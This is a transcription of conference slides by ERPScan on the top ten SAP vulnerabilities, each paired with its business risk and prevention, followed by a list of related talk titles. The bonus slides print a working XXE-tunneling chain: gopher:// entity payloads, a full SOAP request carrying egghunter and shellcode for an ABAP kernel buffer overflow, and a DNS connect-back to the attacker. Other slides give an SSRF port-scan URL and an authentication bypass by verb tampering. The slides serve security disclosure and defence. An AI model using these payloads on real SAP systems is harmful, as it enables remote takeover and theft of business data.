Alexander Polyakov. CTO at ERPScan

Size: px
Start display at page:

Download "Alexander Polyakov. CTO at ERPScan"

Transcription

1 Invest in security to secure investments Top 10 most interes.ng SAP vulnerabili.es and a9acks + bonus Alexander Polyakov. CTO at ERPScan 1

2 About ERPScan The only 360- degree SAP Security solu8on - ERPScan Security Monitoring Suite for SAP Leader by the number of acknowledgements from SAP ( 150+ ) 60+ presenta.ons key security conferences worldwide 25 Awards and nomina.ons Research team - 20 experts with experience in different areas of security Headquarters in Palo Alto (US) and Amsterdam (EU) 2

3 What is SAP? Shut up And Pay 3

4 Really The most popular business applica8on More than customers 74% of Forbes 500 4

5 Agenda Intro SAP security history SAP on the Internet Top 10 latest interes8ng apacks DEMOs Conclusion 5

6 3 areas of SAP Security 2002 Business logic security (SOD) Prevents a3acks or mistakes made Solu8on: GRC 2008 ABAP Code security Prevents a3acks or mistakes made by developers Solu8on: Code audit 2010 Applica3on pla4orm security Prevents unauthorized access both insiders and remote a3ackers Solu8on: Vulnerability Assessment and Monitoring 6

7 Talks about SAP security Most popular: BlackHat HITB Troopers RSA Source DeepSec etc

8 SAP Security notes By june, 2012, more than 2300 notes

9 SAP vulnerabili.es by type 1 - Directory Traversal 2 - XSS/Unauthorised modifica8on of stored 3 - Missing Auth check 4 - Informa8on Disclosure 5 - Unauthorized usage of applica8on 6 - Hard- coded creden8als 7 - Code injec8on vulnerability 8 - Verb tampering 9 - Remote Code Execu8on 10 - Denial of service 11 - BOF 12 - SQL Inj Stats from : 1Q Q Q

10 Top problems by OWASP- EAS EASAI- 1 Lack of patch management EASAI- 2 Default Passwords for applica8on access EASAI- 3 SOD conflicts EASAI- 4 Unnecessary Enabled Applica8on features EASAI- 5 Open Remote management interfaces EASAI- 6 lack of password lockout/complexity checks EASAI- 7 Insecure op8ons EASAI- 8 Unencrypted communica8ons EASAI- 9 Insecure trust rela8ons EASAI- 10 Guest access 10

11 Top problems by BIZEC BIZEC TEC- 01: Vulnerable Sohware in Use BIZEC TEC- 02: Standard Users with Default Passwords BIZEC TEC- 03: Unsecured SAP Gateway BIZEC TEC- 04: Unsecured SAP/Oracle authen.ca.on BIZEC TEC- 05: Insecure RFC interfaces BIZEC TEC- 06: Insufficient Security Audit Logging BIZEC TEC- 07: Unsecured SAP Message Server BIZEC TEC- 08: Dangerous SAP Web Applica8ons BIZEC TEC- 09: Unprotected Access to Administra8on Services BIZEC TEC- 10: Insecure Network Environment BIZEC TEC- 11: Unencrypted Communica8ons 11

12 Business Risks Espionage Stealing financial informa8on Stealing corporate secrets Stealing suppliers and customers list Stealing HR data Sabotage Denial of service Modifica8on of financial reports Access to technology network (SCADA) by trust rela8ons Fraud False transac8ons Modifica8on of master data e.t.c. 12

13 SAP in the Internet We have collected data about SAP systems in the WEB Have various stats by countries, applica8ons, versions Informa8on from Google, Shodan, Nmap scan Published in SAP Security in figures: a global survey Upda8ng results at sapscan.com MYTH: SAP systems a9acks available only for insiders 13

14 SAP in the Internet (web- services) 2 SAP web services can be found in internet (In Hungary) 14

15 SAP in the Internet (other services) > 5000 non- web SAP services exposed in the world >50 in Hungary Including Dispatcher, Message server, SapHostcontrol,etc 15

16 SAP in the Internet (other services) % of companies that expose different services Hungary World 16

17 Top 10 vulnerabili.es Authen8ca8on Bypass via Verb tampering 2. Authen8ca8on Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execu8on via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryp8on in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scrip8ng DOS 17

18 10 GUI- Scrip.ng DOS: Descrip.on SAP users can run scripts which automate their user func8ons A script has the same rights in SAP as the user who launched it Security message which is shown to user can be turned off in the registry Almost any user can use SAP Messages (SM02 transac8on) New It is possible to run DOS apack on any user using a simple script Author: Dmitry Chastukhin (ERPScan) 18

19 10 GUI- scrip.ng: Other a9acks Script can be uploaded using: SAPGUI Ac8veX vulnerability Teensy USB flash Any other method of client exploita8on Other a9acks like changing banking accounts in LFBK also possible 19

20 10 GUI- scrip.ng: Business risks Sabotage High Espionage No Fraud No Ease of exploita.on Medium 20

21 Top 10 vulnerabili.es Authen8ca8on Bypass via Verb tampering 2. Authen8ca8on Bypass via the Invoker servlet 3. Buffer overflow in ABAP Kernel 4. Code execu8on via TH_GREP 5. MMC read SESSIONID 6. Remote portscan 7. Encryp8on in SAPGUI 8. BAPI XSS/SMBRELAY 9. XML Blowup DOS 10. GUI Scrip8ng DOS 21

22 10 GUI- scrip.ng: Preven.on SAP GUI Scrip8ng Security Guide Don t ac8vate SAP GUI Scrip8ng if you do not need it sapgui/ user_scrip8ng = FALSE (dafault) Scrip8ng with read only capabili8es use the parameter - sapgui/user_scrip8ng = TRUE - sapgui/user_scrip8ng_set_readonly = TRUE Block registry modifica8on on worksta8ons 22

23 9 XML Blowup DOS: Descrip.on WEBRFC interface can be used to run RFC func8ons By default any user can have access Can execute at least RFC_PING SAP NetWeaver is vulnerable to malformed XML packets It is possible to run DOS apack on server using simple script It is possible to run over the Internet! Author: Alexey Tyurin (ERPScan) 23

24 9 XML Blowup DOS: Business risks Sabotage Cri.cal Espionage No Fraud No Ease of exploita.on Medium 24

25 9 XML Blowup DOS: Preven.on Disable WEBRFC Prevent unauthorized access to WEBRFC using S_ICF Install SAP notes and and

26 8 BAPI script injec.on/hash stealing : Descrip.on SAP BAPI transac8on fails to properly sani8ze input Possible to inject JavaScript code or link to a fake SMB server SAP GUI clients use Windows so their creden8als will be transferred to apackers host. Author: Dmitry Chastukhin (ERPScan) 26

27 8 BAPI script injec.on/hash stealing 27

28 8 BAPI script injec.on: Business risks Espionage High Sabotage High Fraud High Ease of exploita.on Low 28

29 8 BAPI script injec.on: Preven.on Install SAP notes

30 7 SAP GUI bad encryp.on: Descrip.on SAP FrontEnd can save encrypted passwords in shortcuts Shortcuts stored in.sap file This password uses byte- XOR algorithm with secret key Key has the same value for every installa8on of SAP GUI Any password can be decrypted in less than second Author: Alexey Sintsov (ERPScan) 30

31 7 SAP GUI bad encryp.on: Demo 31

32 7 SAP GUI bad encryp.on: Business risks Espionage High Sabotage Medium Fraud High Ease of exploita.on Medium 32

33 7 SAP GUI bad encryp.on: Preven.on Disable password storage in GUI 33

34 6 Remote port scan/ssrf: Descrip.on It is possible to scan internal network from the Internet Authen8ca8on is not required SAP NetWeaver J2EE engine is vulnerable /ipcpricing/ui/bufferoverview.jsp? server= & port=31337 & password= & dispatcher= & targetclient= & view= Author: Alexander Polyakov (ERPScan) 34

35 6 Remote port scan/ssrf: Demo HTTP port Port closed SAP port 35

36 6 Remote port scan/ssrf: Business risks Sabotage Low Espionage Medium Fraud No Ease of exploita.on High 36

37 6 Remote port scan/ssrf: Preven.on Disable unnecessary applica8ons Install SAP notes: , , , ,

38 5 MMC JSESSIONID stealing: Descrip.on Remote management of SAP Playorm By default, many commands go without auth Exploits implemented in Metasploit (by ChrisJohnRiley) Most of the bugs are informa8on disclosure It is possible to find informa8on about JSESSIONID Only if trace is ON 1) Original bug by ChrisJohnRiley 2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan) Can be authen.cated as an exis.ng user remotely 38

39 5 MMC JSESSIONID stealing: Business risks Espionage Cri.cal Fraud High Sabotage Medium Ease of exploita.on Medium 39

40 5 MMC JSESSIONID stealing: Preven.on Don t use TRACE_LEVEL = 3 on produc8on systems or delete traces hpp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe a114084/frameset.htm 40

41 4 RCE in TH_GREP: Descrip.on RCE vulnerability in RFC module TH_GREP Found by Joris van de Vis SAP was not properly patched ( ) We have discovered that the patch can be bypassed in Windows Original bug by Joris van de Vis (erp- sec) Bypass by Alexey Tyurin (ERPScan) 41

42 4 RCE in TH_GREP: Details elseif opsys = 'Windows NT'. concatenate '/c:"' string '"' filename into grep_params in character mode. else. /*if linux*/ /* 185 */ replace all occurrences of '''' in local_string with '''"''"'''. /* 186 */ concatenate '''' local_string '''' filename into grep_params /* 187*/ in character mode. /* 188*/ endif. /* 188*/ 42

43 4 RCE in TH_GREP: Demo #1 43

44 4 - RCE in TH_GREP: More details 4 ways to execute vulnerable program: Using transac8on "Se37 Using transac8on SM51 (thanks to Felix Granados) Using remote RFC call "TH_GREP" Using SOAP RFC call "TH_GREP" via web 44

45 4 RCE in TH_GREP: Demo #2 45

46 4 RCE in TH_GREP: Business risks Espionage High Sabotage Medium Fraud High Ease of exploita.on medium 46

47 4 RFC in TH_GREP: Preven.on Install SAP notes , Prevent access to cri8cal transac8ons and RFC func8ons Check the ABAP code of your Z- transac8ons for similar vulnerabili8es 47

48 3 - ABAP Kernel BOF: Descrip.on Presented by Andreas Wiegenstein at BlackHat EU 2011 Buffer overflow in SAP kernel func8on C_SAPGPARAM When NAME field is more than 108 chars Can be exploited by calling an FM which uses C_SAPGPARAM Example of report RSPO_R_SAPGPARAM Author: (VirtualForge) 48

49 3 ABAP Kernel BOF: Business risks Espionage Cri.cal Sabotage Cri.cal Fraud Cri.cal Ease of exploita.on Medium 49

50 3 ABAP Kernel BOF: Preven.on Install SAP notes: Correc8ng buffer overflow in ABAP system call Poten8al remote code execu8on in SAP Kernel Prevent access to cri8cal transac8ons and RFC func8ons Check the ABAP code of your Z- transac8ons for cri8cal calls 50

51 2 Invoker Servlet: Descrip.on Rapidly calls servlets by their class name Published by SAP in their security guides Possible to call any servlet from the applica8on Even if it is not declared in WEB.XML Can be used for auth bypass 51

52 2 - Invoker Servlet: Details <servlet> <servlet- name>cri8calac8on</servlet- name> <servlet- class>com.sap.admin.cri8cal.ac8on</servlet- class> </servlet> <servlet- mapping> <servlet- name>cri8calac8on</</servlet- name> <url- papern>/admin/cri8cal</url- papern> </servlet- mapping <security- constraint> <web- resource- collec8on> <web- resource- name>restrictedaccess</web- resource- name> <url- papern>/admin/*</url- papern> <hpp- method>get</hpp- method> </web- resource- collec8on> <auth- constraint> <role- name>admin</role- name> </auth- constraint> </security- constraint> Author: Dmitry Chastukhin (ERPScan) What if we call /servlet/com.sap.admin.cri.cal.ac.on 52

53 2 Invoker servlet: Business risks Espionage High Sabotage High Fraud High Ease of use Very easy! 53

54 2 - Invoker servlet: Preven.on Update to the latest patch , EnableInvokerServletGlobally must be false Check all WEB.XML files by ERPScan WEBXML checker 54

55 1 VERB Tampering 55

56 1 st Place Verb Tampering <security- constraint> <web- resource- collec8on> <web- resource- name>restrictedaccess</web- resource- name> <url- papern>/admin/*</url- papern> <hpp- method>get</hpp- method> </web- resource- collec8on> <auth- constraint> <role- name>admin</role- name> </auth- constraint> Author: Alexander Polyakov (ERPScan) </security- constraint> What if we use HEAD instead of GET? 56

57 1 st Place Verb tampering: Details CTC - interface for managing J2EE engine Can be accessed remotely Can run user management ac8ons: Add users Add to groups Run OS commands Start/Stop J2EE Remotely without authen.ca.on! 57

58 1 Verb tampering: More details If patched, can be bypassed by the Invoker servlet! 58

59 1 Verb tampering: Business risks Espionage Cri.cal Sabotage Cri.cal Fraud Cri.cal Ease of use Very easy! 59

60 1 st Place Verb tampering: Preven.on Install SAP notes , Install other SAP notes about Verb Tampering Scan applica8ons by ERPScan WEB.XML checker Disable the applica8ons that are not necessary 60

61 Bonus Track! DilbertMSG web service No I m not kidding Use Soap XML For tes8ng purpose Shipped with SAP PI < 7.1 by default Accessed without authoriza8on Patched just month ago in SAP Security note Epic! 61

62 Bonus track! XXE Tunneling <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher:// :3300/ AAAAAAAAA" >]> <foo>&date;</foo> What will happen?? 62

63 XXE Tunneling details Server A (Portal or XI) POST /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.dilbertmsg?format=post HTTP/1.1 Host: :8000 <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher:// :3300/ AAAAAAAAA" >]> <foo>&date;</foo> AAAAAAAA A Server B (ERP, HR, BW etc.) Port 3300 telnet

64 XXE Tunneling to Buffer Overflow (step 1) A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in SAP note ) Hard to exploit because it requires calling an RFC func8on which calls Kernel func8on We exploit it via WEBRFC Can be fixed by SAP notes: , , , According to our report, WEBRFC is installed in 40% of NetWeaver ABAP, even on the Internet 64

65 XXE Tunneling to Buffer Overflow (step 2) Shellcode size is limited to 255 bytes (name parameter) As we don t have direct connec8on to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back But the XML engine saves some XML data in RWX memory (XML Spraying) So we can use egghunter Any shellcode can be uploaded 65

66 XXE Tunneling to Buffer Overflow (Step 3) POST /sap/bc/soap/rfc?sap- client=000 HTTP/1.1 Authoriza8on: Basic U1FQKjowMjA3NTk3== Host: company.com:80 User- Agent: ERPSCAN Pentes8ng tool v 0.2 Content- Type: text/xml; charset=uy- 8 Cookie: sap- client=000 Content- Length: 2271 <SOAP- ENV:Envelope xmlns:soap- ENV="hPp://schemas.xmlsoap.org/soap/envelope/" xmlns:soap- ENC="hPp://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="hpp:// instance" xmlns:xsd="hpp:// ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap- com:document:sap:rfc:func8ons"><heap_egg>dsecdsechff 4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q 0F O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p 4k2H3l0n3h5L0u7k3P2p N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s 1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i 0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V M2Z6M1R112 NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4 C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300 Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G O074 X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</ HEAP_EGG><NAME>ºÿÿÎ<f&#129;Êÿ&#015;BRjCXÍ.<& #005;Ztï dsec&#139;ú uê uçÿç&#144;&#144;& #144;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#158;&#14;¾«DSEC^&#023;&#012;&#001; ü1+&#001;ôsò&#000;&#018;:g&#000;ú/9&#016;lÿt&#000;&#001; &#002;&#000;&#000;â&#020;_&#000;@&#000;&#000;&#000;a}X&#016;s q&#002;uú &#157;&#000;&#004;&#128;E&#000;RY&#012;&#016;ë&#004;ë&#002;&#134;&#027;Æ&#000;ÿÿé MÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ NAME></m:RSPO_R_SAPGPARAM></SOAP- ENV:Body></SOAP- ENV:Envelope> 66

67 XXE Tunneling to Buffer Overflow (Step 4) Next step is to pack this packet B into Packet A We need to insert non- printable symbols God bless gopher; it supports urlencode like HTTP It will also help us evade apack against IDS systems Packet A POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 Content- Length: 7730 <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher://[urlencoded Packet B]" >]> <foo>&date;</foo> 67

68 XXE Tunneling to Buffer Overflow: Final step POST /XISOAPAdapter/servlet/ com.sap.aii.af.mp.soap.web.dilbertmsg? format=post HTTP/1.1 Host: sapserver.com:80 Server A on the Internet (SAP XI) <?xml version="1.0" encoding="iso "?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM gopher:// [packetb]" >]> <foo>&date;</foo> Packet B Server B in DMZ (SAP ERP) hpp://company.com Port 8000 WebRFC service Packet C Command and Control response to a9acker by DNS protocol which is allowed for outband connec.ons Shellcode service with DNS payload 68

69 Full control over the internal system through the Internet 69

70 Conclusion It is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure SAP Guides Regular Security assessments Monitoring technical security ABAP Code review Segrega.on of Du.es It s all in your hands 70

71 Future work Many of the researched things cannot be disclosed now because of our good reladonship with SAP Security Response Team, whom I would like to thank for cooperadon. However, if you want to see new demos and 0- days, follow us and a3end the future presentadons: 16 October - IT Security Expo (Germany,Nurnberg) 30 October - HackerHalted (USA,Miami) 2-3 November - HashDays (Switzerland,Lucerne) 8-9 November - POC In Korea (Korea,Seul) 20 November ZeroNights (Russia,Moscow) 29 November- DeepSEC (Austria,Vienna) 71

72 Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov. 72

EAS- SEC: Framework for Securing Enterprise Business Applica;ons

EAS- SEC: Framework for Securing Enterprise Business Applica;ons Invest in security to secure investments EAS- SEC: Framework for Securing Enterprise Business Applica;ons Alexander Polyakov CTO ERPScan About ERPScan The only 360- degree SAP Security solu8on - ERPScan

More information

EAS- SEC: Framework for Securing Enterprise Business ApplicaCons

EAS- SEC: Framework for Securing Enterprise Business ApplicaCons SAP in Internet EAS- SEC: Framework for Securing Enterprise Business ApplicaCons Alexander Polyakov CTO ERPScan erpscan.com ERPScan invest in security to secure investments 1 SAP in Internet erpscan.com

More information

Invest in security to secure investments. Breaking SAP Portal. Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan

Invest in security to secure investments. Breaking SAP Portal. Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan Invest in security to secure investments Breaking SAP Portal Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan About ERPScan The only 360- degree SAP Security solu8on - ERPScan

More information

Invest in security to secure investments. Implemen'ng SAP security in 5 steps. Alexander Polyakov. CTO, ERPScan

Invest in security to secure investments. Implemen'ng SAP security in 5 steps. Alexander Polyakov. CTO, ERPScan Invest in security to secure investments Implemen'ng SAP security in 5 steps Alexander Polyakov. CTO, ERPScan About ERPScan The only 360- degree SAP security solu'on: ERPScan Security Monitoring Suite

More information

SSRF VS. BUSINESS- CRITICAL

SSRF VS. BUSINESS- CRITICAL SSRF VS. BUSINESS- CRITICAL APPLICATIONS. PART 1: XXE TUNNELING IN SAP NETWEAVER Authors: Alexander Polyakov Dmitry Chastukhin Alexey Tyurin Content Important notes... 4 Intro... 5 Introduction to Business

More information

Architecture Figure 3.

Architecture Figure 3. The popularity of SAP EP and its availability on the Internet makes it a desirable entry point for hackers who are choosing the spot to attack companies of various size and industry. Let s take a look

More information

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0 Welcome BIZEC Roundtable @ IT Defense, Berlin SAP Security BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0 February 1, 2013 Andreas Wiegenstein CTO, Virtual Forge 2 SAP Security SAP security is a complex

More information

Invest in security to secure investments. Breaking SAP Portal Dmitry Chastuchin Principal Researcher ERPScan

Invest in security to secure investments. Breaking SAP Portal Dmitry Chastuchin Principal Researcher ERPScan Invest in security to secure investments Breaking SAP Portal Dmitry Chastuchin Principal Researcher ERPScan Dmitry Chastuhin Yet another security researcher Business application security expert ERPScan

More information

A crushing blow at the heart of SAP s J2EE Engine.

A crushing blow at the heart of SAP s J2EE Engine. Invest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Alexander Polyakov CTO ERPScan Me CTO of the ERPScan company Head of DSecRG (research subdivision) Architect

More information

Invest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP

Invest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP Invest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP Alexander Polyakov CTO at ERPScan Dmitry Chastukhin Principal Researcher at ERPScan Please download

More information

Invest in security to secure investments Oracle PeopleSo, applica.ons are under a3acks!

Invest in security to secure investments Oracle PeopleSo, applica.ons are under a3acks! Invest in security to secure investments Oracle PeopleSo, applica.ons are under a3acks! Alexey Tyurin About ERPScan The only 360- degree SAP Security solu9on - ERPScan Security Monitoring Suite for SAP

More information

A GLOBAL SURVEY Authors:

A GLOBAL SURVEY Authors: SAP SECURITY IN FIGURES: A GLOBAL SURVEY 2007 2013 Authors: Alexander Polyakov Alexey Tyurin Other contributors: Kirill Nikitenkov Evgeny Neyolov Alina Oprisko Dmitry Shimansky A GLOBAL SURVEY 2007 2013

More information

Inception of the SAP Platform's Brain Attacks on SAP Solution Manager

Inception of the SAP Platform's Brain Attacks on SAP Solution Manager Inception of the SAP Platform's Brain Attacks on SAP Solution Manager Juan Perez-Etchegoyen Etchegoyen jppereze@onapsis.com September 20 th, 2012 Ekoparty, Buenos Aires Disclaimer This publication is copyright

More information

SAP Portal: Hacking and forensics Dmitry Chastukhin Director of SAP pentest/research team Evgeny Neyolov Security analyst, (anti)forensics research

SAP Portal: Hacking and forensics Dmitry Chastukhin Director of SAP pentest/research team Evgeny Neyolov Security analyst, (anti)forensics research Invest in security to secure investments SAP Portal: Hacking and forensics Dmitry Chastukhin Director of SAP pentest/research team Evgeny Neyolov Security analyst, (anti)forensics research ERPScan Developing

More information

Invest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Version 1.1

Invest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Version 1.1 Invest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Version 1.1 Alexander Polyakov, Dmitriy Chastuhin ERPScan Me CTO of the ERPScan company Head of DSecRG (research

More information

Mobile Trends And The New Threats Is Your SAP System Vulnerable to Cyber Attacks? Stephen Lamy, Virtual Forge

Mobile Trends And The New Threats Is Your SAP System Vulnerable to Cyber Attacks? Stephen Lamy, Virtual Forge Mobile Trends And The New Threats Is Your SAP System Vulnerable to Cyber Attacks? Stephen Lamy, Virtual Forge Agenda Mobile Trends and The New Threats The Forgotten Layer Benchmarks of Defects in Custom

More information

About the company. What we do? Cybersecurity solutions adapted to protect enterprise business applications (SAP & Oracle).

About the company. What we do? Cybersecurity solutions adapted to protect enterprise business applications (SAP & Oracle). About the company 2 What we do? Cybersecurity solutions adapted to protect enterprise business applications (SAP & Oracle). Agenda 3 Building a business case for SAP Vulnerability Management How to start

More information

Pattern Recognition and Applications Lab WEB Security. Giorgio Giacinto.

Pattern Recognition and Applications Lab WEB Security. Giorgio Giacinto. Pattern Recognition and Applications Lab WEB Security Giorgio Giacinto giacinto@diee.unica.it Sicurezza Informa1ca, 2015-2016 Department of Electrical and Electronic Engineering University of Cagliari,

More information

Attacks to SAP. Web Applications Your crown jewels online. Mariano Nuñez Di Croce. DeepSec, Austria. November 18th,

Attacks to SAP. Web Applications Your crown jewels online. Mariano Nuñez Di Croce. DeepSec, Austria. November 18th, Attacks to SAP Web Applications Your crown jewels online Mariano Nuñez Di Croce mnunez@onapsis.com November 18th, 2011 DeepSec, Austria Disclaimer This publication is copyright 2011 Onapsis SRL All rights

More information

How to read security test report?

How to read security test report? How to read security test report? Ainārs Galvāns Security Tester Exigen Services Latvia www.exigenservices.lv Defini@ons (wikipedia) Term Threat Vulnerability Informa@on assurance Defini+on A threat is

More information

About ERPScan. ERPScan and Oracle. ERPScan researchers were acknowledged 20+ times during quarterly Oracle patch updates since 2008

About ERPScan. ERPScan and Oracle. ERPScan researchers were acknowledged 20+ times during quarterly Oracle patch updates since 2008 1 2 About ERPScan 3 ERPScan and Oracle ERPScan researchers were acknowledged 20+ times during quarterly Oracle patch updates since 2008 Totally 100+ Vulnerabilities closed in Oracle Applications o Oracle

More information

Attacks based on security configurations

Attacks based on security configurations SAP Security 2014 Protecting Your SAP Systems Against Attacks based on security configurations Juan Perez-Etchegoyen jppereze@onapsis.com March 18 th, 2014 BIZEC Workshop Disclaimer This publication is

More information

Top 10 Web Application Vulnerabilities

Top 10 Web Application Vulnerabilities Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other

More information

Forgotten World: Corporate Business Application Systems

Forgotten World: Corporate Business Application Systems Forgotten World: Corporate Business Application Systems Alexander Polyakov (dsecrg.com) Val Smith (AttackResearch.com) BlackHat DC 2011 1. Abstract... 3 2. Intro... 4 2.1. Threat... 4 2.2. Introduction

More information

Roadmap. How to implement GDPR in SAP?

Roadmap. How to implement GDPR in SAP? Roadmap 2 How to implement GDPR in SAP? 1. Introduction to GDPR 2. GDPR security-related requirements 3. SAP security controls for GDPR 4. GDPR security implementation plan 5. Follow-up actions Introduction

More information

Objec&ves. Review: Security. Google s AI is wri&ng poetry SQL INJECTION ATTACK. SQL Injec&on. SQL Injec&on. Security:

Objec&ves. Review: Security. Google s AI is wri&ng poetry SQL INJECTION ATTACK. SQL Injec&on. SQL Injec&on. Security: Objec&ves Security: Ø Injec&on a6acks Ø Cross-site scrip&ng Ø Insecure direct object reference Group photo Review: Security Why has the Web become such a huge target? How can you protect against security

More information

SAP Security In-Depth

SAP Security In-Depth SAP Security In-Depth by Mariano Nunez Vol. 5 / May 2012 Abstract "SAP platforms are only accessible internally". While that was true in many organizations more than a decade ago, today, driven by modern

More information

Onapsis: The CISO Imperative Taking Control of SAP

Onapsis: The CISO Imperative Taking Control of SAP Onapsis: The CISO Imperative Taking Control of SAP Cyberattacks @onapsis 2016 Key SAP Cyber-Security Trends Over 95% of the SAP systems we have assessed, were exposed to vulnerabilities that could lead

More information

whoami Yet another security Business application security expert

whoami Yet another security Business application security expert whoami Yet another security researcher: @_chipik Business application security expert whoami Head of Professional Services Areas of research: security architecture, digital signatures, data retention,

More information

16th Annual Karnataka Conference

16th Annual Karnataka Conference 16th Annual Karnataka Conference GRC Compliance to Culture JULY 19 & 20, 2013 Topic OWASP Top 10 An Overview Speakers Akash Mahajan & Tamaghna Basu OWASP Top 10 An Overview The Open Web Application Security

More information

Application security : going quicker

Application security : going quicker Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF

More information

SAP, dos, dos, race conditions => rce. Dmitry Chastuhin, Dmitry Yudin

SAP, dos, dos, race conditions => rce. Dmitry Chastuhin, Dmitry Yudin SAP, dos, dos, race conditions => rce Dmitry Chastuhin, Dmitry Yudin 1 About us Yet another security researcher Business application security expert ERPScan Wiem, jak korzystać z tłumaczami 2 About us

More information

Preventing vulnerabilities in HANAbased MARCH TROOPERS SECURITY CONFERENCE

Preventing vulnerabilities in HANAbased MARCH TROOPERS SECURITY CONFERENCE Preventing vulnerabilities in HANAbased deployments MARCH 2016 - TROOPERS SECURITY CONFERENCE Disclaimer This presentation contains references to the products of SAP SE. SAP, R/3, xapps, xapp, SAP NetWeaver,

More information

Exploiting new default accounts in SAP systems

Exploiting new default accounts in SAP systems Exploiting new default accounts in SAP systems Introduction Who is ERP-SEC Company specialized in securing SAP systems and infrastructures SAP Security Research: Reported and credited for > 60 vulnerabilities

More information

Secure Programming Techniques

Secure Programming Techniques Secure Programming Techniques Meelis ROOS mroos@ut.ee Institute of Computer Science Tartu University spring 2014 Course outline Introduction General principles Code auditing C/C++ Web SQL Injection PHP

More information

Exploiting new default accounts in SAP systems

Exploiting new default accounts in SAP systems Exploiting new default accounts in SAP systems Agenda Introduction Something about SAP security Unknown default accounts Impact Exploitation: combination with other vulnerabilities Research Solutions Concluding

More information

Web Pen Tes)ng. Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012

Web Pen Tes)ng. Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012 Web Pen Tes)ng Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012 Exploi)ng Vulnerabili)es Code injec)on Cross site scrip)ng, SQL injec)on, (buffer

More information

In The Middle of Printers The (In)Security of Pull Prin8ng Solu8ons. Jakub Kałużny. SecuRing

In The Middle of Printers The (In)Security of Pull Prin8ng Solu8ons. Jakub Kałużny. SecuRing In The Middle of Printers The (In)Security of Pull Prin8ng Solu8ons Jakub Kałużny SecuRing #whoami IT Security Consultant at SecuRing Consul8ng all phases of SDLC Previously worked for ESA and online money

More information

Easy and quick vulnerability hun5ng in Windows. Cesar Cerrudo CTO at IOAc5ve Labs

